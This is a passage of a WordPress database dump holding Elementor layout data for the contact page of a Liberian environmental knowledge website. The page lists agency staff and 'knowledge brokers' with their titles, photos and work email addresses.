href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24645,3644,'_wp_attached_file','2021/03/sherman.png'),(24646,3644,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:19:\"2021/03/sherman.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"sherman-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"sherman-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24653,3646,'_wp_attached_file','2021/03/borbor.png'),(24654,3646,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:18:\"2021/03/borbor.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"borbor-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"borbor-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24655,3647,'_elementor_edit_mode','builder'),(24656,3647,'_elementor_template_type','wp-page'),(24657,3647,'_elementor_version','3.0.16'),(24658,3647,'_wp_page_template','default'),(24659,3647,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. 